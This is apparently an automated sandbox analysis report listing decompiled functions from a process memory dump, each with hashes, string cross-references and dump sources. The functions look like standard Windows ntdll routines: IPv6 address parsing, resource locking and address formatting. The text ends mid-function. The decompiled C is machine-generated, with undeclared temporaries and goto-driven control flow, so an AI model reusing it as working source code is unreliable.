String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 3901378454-484625025
Opcode ID: c7d9f656b8ca5abd3a70d7caa1040d11507168d1fa23faa36b1d3c9fa924a533
Instruction ID: 2e955b7919ba23a5f945d28a095cb90908f16f2bd2eb1342bc1449efdd66faa4
Opcode Fuzzy Hash: c7d9f656b8ca5abd3a70d7caa1040d11507168d1fa23faa36b1d3c9fa924a533
Instruction Fuzzy Hash: 5C41987168022C7AEF21DB949DC5FDBB3BDAB14704F0004AAA906E6181EF709A49CF65

Uniqueness

Uniqueness Score: -1.00%

Function 02A60B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02A60B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E02A38980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E02A2DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E02A60CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E02A60CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E02A606BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E02A606BA(_t135, _t178) == 0 || E02A60A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E02A60CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E02A60CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E02A606BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E02A606BA(_t124, _t142) == 0 || E02A60A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

0x02a60b21
0x02a60b24
0x02a60b27
0x02a60b2a
0x02a60b2d
0x02a60b30
0x02a60b33
0x02a60b36
0x02a60b39
0x02a60b3e
0x02a60c65
0x02a60c68
0x02a60c6a
0x02a60c6f
0x02a8eb42
0x00000000
0x00000000
0x02a8eb48
0x02a8eb48
0x02a60c75
0x02a60c7a
0x02a8eb54
0x00000000
0x00000000
0x00000000
0x02a8eb5a
0x02a60c80
0x02a60c84
0x02a8eb98
0x00000000
0x00000000
0x02a8eba6
0x02a60cb8
0x02a60cba
0x02a60cd3
0x02a60cda
0x02a60ce4
0x02a60ce9
0x00000000
0x02a60cec
0x02a60c8c
0x02a8eb63
0x00000000
0x00000000
0x02a8eb70
0x02a8eb75
0x02a8eb7d
0x00000000
0x00000000
0x02a8eb8c
0x00000000
0x02a8eb8c
0x02a60c96
0x00000000
0x00000000
0x02a60ca2
0x02a60cac
0x02a60cb4
0x00000000
0x00000000
0x02a60b44
0x02a60b47
0x02a60b49
0x00000000
0x00000000
0x02a60b4f
0x02a60b50
0x00000000
0x00000000
0x02a60b56
0x02a60b62
0x02a60b7c
0x02a60bac
0x02a60a0f
0x02a8eaaa
0x00000000
0x02a8eac4
0x02a8eac4
0x02a60bd0
0x02a60bd0
0x02a60bd4
0x02a60bd9
0x00000000
0x00000000
0x02a60bdb
0x02a60be0
0x02a8eb0e
0x02a60a1a
0x00000000
0x02a60a1a
0x02a8eb1a
0x02a8eb1f
0x02a8eb27
0x00000000
0x00000000
0x02a8eb36
0x00000000
0x02a8eb36
0x02a60bea
0x00000000
0x00000000
0x02a60bf6
0x02a60c00
0x02a60c03
0x02a60c0b
0x00000000
0x02a60c0b
0x02a8eaaa
0x00000000
0x02a60a15
0x02a60bb6
0x00000000
0x02a60bc6
0x02a60bc6
0x02a60bcb
0x02a60c15
0x00000000
0x00000000
0x02a60c1d
0x02a60c20
0x02a60c21
0x02a60c24
0x02a60c24
0x02a60c26
0x00000000
0x02a60c26
0x02a60bcd
0x00000000
0x02a60bcd
0x02a60b89
0x02a60b89
0x02a60b90
0x00000000
0x00000000
0x02a60b96
0x00000000
0x02a60b96
0x02a60a04
0x02a60a04
0x02a60b9a
0x02a60b9a
0x02a60b9b
0x02a60b9f
0x00000000
0x00000000
0x00000000
0x02a60ba5
0x02a60ac7
0x02a60aca
0x02a8eacf
0x00000000
0x02a8eade
0x02a8eade
0x02a8eae3
0x00000000
0x00000000
0x02a8eaf3
0x02a8eaf6
0x02a8eaf7
0x02a8eafe
0x02a8eb01
0x00000000
0x02a8eb01
0x02a8eacf
0x02a60ad0
0x02a60ad4
0x00000000
0x00000000
0x02a60ada
0x02a60ae6
0x02a60c34
0x00000000
0x02a60c47
0x02a60c49
0x02a60c4a
0x02a60c4e
0x02a60c51
0x02a60c54
0x02a60c57
0x02a60c5a
0x00000000
0x00000000
0x00000000
0x02a60c60
0x02a60afb
0x02a60afe
0x02a60b02
0x02a60b05
0x02a60b08
0x00000000
0x02a60b08
0x02a60ae6
0x02a60b44
0x02a609f8
0x02a609f8
0x02a609f9
0x00000000
0x00000000
0x02a8eaa0
0x00000000

APIs

__fassign.LIBCMT ref: 02A60BF6
__fassign.LIBCMT ref: 02A60CA2

Strings

:, xrefs: 02A60AC7
., xrefs: 02A60A0C
:, xrefs: 02A60BA9

Memory Dump Source

Source File: 0000000B.00000002.2350777014.0000000002A10000.00000040.00000001.sdmp, Offset: 02A00000, based on PE: true

Associated: 0000000B.00000002.2350772599.0000000002A00000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350900442.0000000002AF0000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350905386.0000000002B00000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350910750.0000000002B04000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350916838.0000000002B07000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350921174.0000000002B10000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350995003.0000000002B70000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID: .$:$:
API String ID: 3965848254-2308638275
Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction ID: e8a81e6192d1379c279306b1e20a13a666048104d0fc5bcfd26e08d48db76f08
Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction Fuzzy Hash: 10A1AC71D0020AEECF24DF64C9887BEB7B6BF15309F24846AD852A7281DF3196C9CB51

Uniqueness

Uniqueness Score: -1.00%

Function 02A60554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E02A60554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x02b001c0;
									_push(_t144);
									_push(0);
									_t51 = E02A1F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E02A64FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E02A73F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E02A73F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E02AA217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02A73F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E02A63915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x02b001c0;
												_push(_t138);
												_push(0);
												_t58 = E02A1F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E02A64FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E02A73F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E02A73F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E02AA217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E02A73F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E02A63915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E02A45384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E02A1F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E02A63915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E02A1F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E02A63915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E02A1F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E02A63915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E02A45329(_t110, _t138);
																_t69 = E02A453A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}

0x02a6055a
0x02a6055d
0x02a60563
0x02a60566
0x02a605d8
0x02a605e2
0x02a605e5
0x00000000
0x02a605e7
0x02a605e7
0x02a605ea
0x02a605f3
0x02a605f3
0x02a60568
0x02a60568
0x02a60568
0x02a60569
0x02a60569
0x02a60569
0x02a6056b
0x00000000
0x00000000
0x02a8217f
0x02a82183
0x02a8225b
0x02a8225f
0x02a82189
0x02a8218c
0x02a8218f
0x02a82194
0x02a82199
0x02a8219d
0x02a821a0
0x02a821a2
0x02a821ce
0x02a821ce
0x02a821ce
0x02a821d0
0x02a821d6
0x02a821de
0x02a821e2
0x02a821e8
0x02a821e9
0x02a821ec
0x02a821f1
0x02a821f6
0x00000000
0x00000000
0x02a821f8
0x02a821fb
0x02a82206
0x02a8220b
0x02a8220c
0x02a82217
0x02a82226
0x02a8222b
0x02a8222c
0x02a8222f
0x02a82232
0x02a82235
0x02a82235
0x02a8223a
0x02a8223f
0x02a82241
0x02a82243
0x02a82248
0x02a82248
0x02a8224d
0x02a8224f
0x02a82262
0x02a82263
0x02a82268
0x02a82269
0x02a82269
0x02a82269
0x02a8226d
0x00000000
0x00000000
0x02a82276
0x02a82279
0x02a8227e
0x02a82283
0x02a82287
0x02a8228a
0x02a8228d
0x02a8228f
0x02a822bc
0x02a822bc
0x02a822bc
0x02a822be
0x02a822c4
0x02a822cc
0x02a822d0
0x02a822d6
0x02a822d7
0x02a822da
0x02a822df
0x02a822e4
0x00000000
0x00000000
0x02a822e6
0x02a822e9
0x02a822f4
0x02a822f9
0x02a822fa
0x02a82305
0x02a82314
0x02a82319
0x02a8231a
0x02a8231d
0x02a82320
0x02a82323
0x02a82323
0x02a82328
0x02a8232d
0x02a8232f
0x02a82331
0x02a82336
0x02a82336
0x02a8233b
0x02a8233d
0x02a82350
0x02a82351
0x02a82356
0x02a82359
0x02a82359
0x02a8235b
0x02a8235d
0x02a45367
0x02a4536b
0x02a45372
0x00000000
0x00000000
0x00000000
0x00000000
0x02a82363
0x02a82363
0x02a82369
0x02a8236a
0x02a8236c
0x02a82371
0x02a82373
0x00000000
0x02a82379
0x02a82379
0x02a8237a
0x02a8237f
0x02a8237f
0x02a82385
0x02a82386
0x02a82389
0x02a8238e
0x02a82390
0x02a45378
0x02a4537c
0x02a82396
0x02a82396
0x02a82397
0x02a8239c
0x02a823a2
0x02a823a3
0x02a823a6
0x02a823ab
0x02a823ad
0x00000000
0x02a823b3
0x02a823b3
0x02a823b4
0x02a823b9
0x02a823ba
0x02a823ba
0x02a823bc
0x02a823bf
0x00000000
0x00000000
0x02a79153
0x02a79158
0x02a7915a
0x02a7915e
0x02a79160
0x00000000
0x02a79166
0x02a79166
0x02a79171
0x02a79176
0x02a79176
0x00000000
0x02a79160
0x02a823c6
0x02a823ce
0x02a823d7
0x02a823d7
0x02a823ad
0x02a82390
0x02a82373
0x02a8233f
0x02a8233f
0x00000000
0x02a8233f
0x02a82291
0x02a82291
0x02a82293
0x02a82295
0x02a8229a
0x02a822a1
0x02a822a3
0x02a822a7
0x02a822a9
0x00000000
0x00000000
0x02a822ab
0x02a822ad
0x02a822af
0x00000000
0x00000000
0x00000000
0x02a822af
0x02a822b1
0x02a822b4
0x02a822b4
0x02a822b6
0x02a453be
0x02a453be
0x02a453be
0x02a453c0
0x00000000
0x00000000
0x02a453cb
0x02a453ce
0x02a453d0
0x02a453d4
0x02a453d6
0x00000000
0x02a453d8
0x02a453e3
0x02a453ea
0x02a453ea
0x00000000
0x02a453d6
0x00000000
0x00000000
0x00000000
0x00000000
0x02a822b6
0x00000000
0x02a8228f
0x02a82349
0x02a8234d
0x02a82251
0x02a82251
0x00000000
0x02a82251
0x02a821a4
0x02a821a4
0x02a821a6
0x02a821a8
0x02a821ac
0x02a821b6
0x02a821b8
0x02a821bc
0x02a821be
0x00000000
0x00000000
0x02a821c0
0x02a821c2
0x02a821c4
0x00000000
0x00000000
0x00000000
0x02a821c4
0x02a821c6
0x02a821c6
0x02a821c8
0x00000000
0x00000000
0x00000000
0x00000000
0x02a821c8
0x02a821a2
0x00000000
0x02a82183
0x02a6057b
0x02a6057d
0x02a60581
0x02a60583
0x02a82178
0x00000000
0x02a60589
0x02a6058f
0x02a6058f
0x02a60583
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02A82206

Strings

RTL: Resource at %p, xrefs: 02A8221D, 02A8230B
RTL: Re-Waiting, xrefs: 02A8223A, 02A82328
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 02A822FC
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02A8220E

Memory Dump Source

Source File: 0000000B.00000002.2350777014.0000000002A10000.00000040.00000001.sdmp, Offset: 02A00000, based on PE: true

Associated: 0000000B.00000002.2350772599.0000000002A00000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350900442.0000000002AF0000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350905386.0000000002B00000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350910750.0000000002B04000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350916838.0000000002B07000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350921174.0000000002B10000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350995003.0000000002B70000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-4236105082
Opcode ID: 699a9101a8b0d5b5b7a7632f1c8cca2523d0069047f9660c213e0cc90af90a90
Instruction ID: 43112ed84691905716ca5a293a914fe27dae6a53c9ec4051010397fefc83da44
Opcode Fuzzy Hash: 699a9101a8b0d5b5b7a7632f1c8cca2523d0069047f9660c213e0cc90af90a90
Instruction Fuzzy Hash: 3F5127717402516FEB149B18CCC1F7673AAAF88721F218259ED55DF284EF71EC858B90

Uniqueness

Uniqueness Score: -1.00%

Function 02A614C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E02A614C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x2b02088; // 0x7765217c
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E02A57707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E02A613CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E02A57707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E02A57707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E02A22340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E02A2E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}

0x02a614c0
0x02a614cb
0x02a614d2
0x02a614d6
0x02a614da
0x02a614de
0x02a614e3
0x02a6157a
0x02a6157a
0x02a614f1
0x02a614f3
0x02a8ea0f
0x00000000
0x02a8ea15
0x00000000
0x02a8ea15
0x02a614f9
0x02a614f9
0x02a614fe
0x02a61504
0x02a8ea1a
0x02a8ea1f
0x02a8ea21
0x02a8ea22
0x02a8ea27
0x02a8ea2a
0x02a8ea2a
0x02a61515
0x02a61517
0x02a6156d
0x02a61572
0x02a61575
0x02a61575
0x02a6151e
0x02a8ea50
0x02a8ea55
0x02a8ea58
0x02a8ea58
0x02a6152e
0x02a61531
0x02a61533
0x00000000
0x02a61535
0x02a61541
0x02a61549
0x02a61549
0x02a61533
0x02a614f3
0x02a61559

APIs

___swprintf_l.LIBCMT ref: 02A8EA22

Part of subcall function 02A613CB: ___swprintf_l.LIBCMT ref: 02A6146B
Part of subcall function 02A613CB: ___swprintf_l.LIBCMT ref: 02A61490

___swprintf_l.LIBCMT ref: 02A6156D

Strings

]:%u, xrefs: 02A8EA47
%%%u, xrefs: 02A61564

Memory Dump Source

Source File: 0000000B.00000002.2350777014.0000000002A10000.00000040.00000001.sdmp, Offset: 02A00000, based on PE: true

Associated: 0000000B.00000002.2350772599.0000000002A00000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350900442.0000000002AF0000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350905386.0000000002B00000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350910750.0000000002B04000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350916838.0000000002B07000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350921174.0000000002B10000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350995003.0000000002B70000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: b1368390094de1e87ab99100b5ed9de31d63e2876c7c07faef87df5e5ed83199
Instruction ID: 53eee949aab86fbf058ab1516bea33f9edeec5ea6767ac1bfaad033334be2c5c
Opcode Fuzzy Hash: b1368390094de1e87ab99100b5ed9de31d63e2876c7c07faef87df5e5ed83199
Instruction Fuzzy Hash: 4C21B172900229ABDB21EF58DD48AFBB7BDBB10704F444055EC4AE3240DF70EA588BE0

Uniqueness

Uniqueness Score: -1.00%

Function 02A453A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E02A453A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
